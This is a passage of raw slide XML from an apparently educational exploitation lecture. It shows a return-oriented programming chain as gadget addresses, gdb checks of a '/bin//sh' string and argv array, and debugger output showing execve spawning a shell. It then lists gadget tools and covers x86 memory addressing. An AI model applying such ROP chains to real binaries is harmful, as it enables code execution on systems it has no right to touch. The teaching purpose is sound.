                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10013"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0809a67d</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080bb6d6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10016"/>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230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0xb</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0xbffff694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xor</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ecx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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80bb6d7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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80541b2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x807b407</a:t>
            </a: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904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652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655955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231</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5893197" y="226143"/>
          <a:ext cx="3696160" cy="25603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0xb</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0x080ea060</a:t>
                      </a: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0x080ea06c</a:t>
                      </a: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0x080ea068</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0xbffff694</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>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0x65646362</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="306256">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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</a:t>
                      </a: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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="226143"/>
            <a:ext cx="8229600" cy="5900022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x080ea060</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea060:	"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x/2wx 0x80ea06c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea06c:	0x080ea060	0x00000000</a:t>
            </a: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x/1wx 0x080ea068</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea068:	0x00000000</a:t>
            </a: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c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>process 5381 is executing new program: /bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", ["/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"], NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Fully ASLR proof ROP payload!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6268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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to find gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ropper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to build ROP chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a comprehensive library used by most of the top CTF teams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121205895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Security Research</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FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>233</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1437319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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),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contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 8 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),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contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>moves the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x804a0e4,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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the value 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
